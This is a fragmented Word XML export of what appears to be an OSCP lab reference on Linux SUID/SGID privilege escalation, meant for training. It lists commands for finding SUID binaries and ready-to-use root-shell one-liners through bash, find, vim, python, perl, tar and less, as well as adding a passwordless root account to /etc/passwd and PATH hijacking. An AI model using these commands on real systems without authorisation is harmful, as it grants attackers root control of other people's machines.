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Linux SUID / SGID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5F8A" w:sz="8" w:space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Privilege Escalation Reference  |  OSCP Lab Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20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What is SUID?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SUID stands for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 User ID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It is a special permission bit on a Linux executable that tells the OS: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“When anyone runs this file, run it as the file’s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owner — not as the person who executed it.”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SUID binaries are owned by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root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which means anyone who runs them temporarily gets root-level execution for the duration of that process.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Why It Exists Legitimately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classic example is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passwd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A regular user needs to change their own password, which requires writing to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/etc/shadow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 root-owned file. Rather than giving every user root access,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passwd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has the SUID bit set and is owned by root. It executes as root just long enough to update the password, then exits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10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ls -la /usr/bin/passwd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-rwsr-xr-x 1 root root ... /usr/bin/passwd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    ^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    s = SUID bit set (lowercase = execute bit also set)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    S = SUID bit set but execute bit is NOT (broken/unusual)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Why It Matters for Privesc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an admin misconfigures a binary — especially a shell, script interpreter, or tool that can run arbitrary commands — with SUID root, you can exploit it to get a root shell.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Find SUID binaries on the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Identify any that are unusual or not part of the standard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GTFOBins for the exact exploitation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Execute to spawn a shell or read/write privileged files</w:t>
      </w:r>
    </w:p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1 — Find SUID Binaries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Standard find command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find / -perm -4000 -type f 2&gt;/dev/null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Show owner alongside each result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find / -perm -u=s -type f 2&gt;/dev/null -exec ls -la {} \;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WinPEAS / LinPEAS automated detection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./linpeas.sh | grep -A 2 'SUID'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9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GTFOBins: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https://gtfobins.github.io  — catalogs every known binary and how to abuse SUID. Check every unfamiliar result here.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2 — Identify What’s Unusual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You’ll always see a standard list of legitimate SUID binaries (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passwd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su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sudo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ping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mount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). What you’re looking for is anything that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should not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have SUID set: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 to look for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Shell interpreters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bash, sh, zsh, dash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Text editors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vim, nano, less, more, man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File tools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cp, find, tar, zip, rsync, mv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Script runners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python, python3, perl, ruby, php, node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Network tools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nmap (older versions — had interactive mode)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 binaries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anything you don’t recognize in /opt, /usr/local, /home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Step 3 — Exploit Examples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bash has SUID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/bin/bash -p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-p flag preserves effective UID (root) instead of dropping it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bash-5.1# whoami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root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find has SUID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find . -exec /bin/sh -p \; -quit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vim has SUID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vim -c ':!/bin/sh -p'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Alternative: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vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'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python has SUID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python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'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cp has SUID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Add a passwordless root user to /etc/passwd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cp /etc/passwd /tmp/passwd_bak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echo 'hacker::0:0:root:/root:/bin/bash' &gt;&gt; /tmp/passwd_bak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cp /tmp/passwd_bak /etc/passwd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su hacker    # no password required, UID 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PATH Hijacking (custom binary calls system() without full path)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SUID binary calls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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">system("cat /etc/hosts")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without the full path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/bin/cat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you can plant a fake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cat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earlier in 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20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$PATH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cd /tmp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echo '/bin/bash -p' &gt; cat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chmod +x cat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export PATH=/tmp:$PATH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$ /path/to/vulnerable_suid_binary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Your fake 'cat' runs as root instead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OSCP tip: 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PATH hijacking is extremely common on OSCP lab boxes. Always check what a suspicious SUID binary is actually calling using strings or strace.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SGID — The Sibling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SGID (Set Group ID)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works the same way but at the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group level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the binary runs as the file’s group rather than its owner. Less common as a direct privesc but worth enumerating.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Find SGID binaries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find / -perm -2000 -type f 2&gt;/dev/null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Find both SUID and SGID in one pass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find / \( -perm -4000 -o -perm -2000 \) -type f 2&gt;/dev/null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LinPEAS Detection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LinPEAS specifically highlights SUID files in its output. Look for the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SUID section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anything highlighted in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red/yellow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that isn’t on the standard list is worth checking on GTFOBins immediately. This is one of the highest-yield areas of the LinPEAS output on OSCP lab boxes.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Run LinPEAS and filter SUID results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./linpeas.sh 2&gt;/dev/null | grep -E 'SUID|SGID' -A 2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# Quick manual SUID check (fast, no script needed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null | xargs ls -la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4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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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bash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/bin/bash -p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Direct root shell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sh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/bin/sh -p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Direct root shell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find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find . -exec /bin/sh -p \; -quit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One-liner shell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vim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vim -c ':!/bin/sh -p'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Via ex command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python3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python3 -c 'import os; os.execl...'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exec os shell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perl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perl -e 'exec "/bin/sh -p";'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exec shell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nmap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nmap --interactive  (&lt; v5.20)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Legacy only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cp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Overwrite /etc/passwd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root user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tar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tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh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Wildcard abuse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less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!sh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within less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top w:val="single" w:color="AAAAAA" w:sz="4" w:space="8"/>
        </w:pBdr>
        <w:spacing w:before="16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OSCP Recon Suite  |  gtfobins.github.io  |  Generated by oscp_recon.py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2026-03-24T20:34:39.625Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-24T20:34:39.626Z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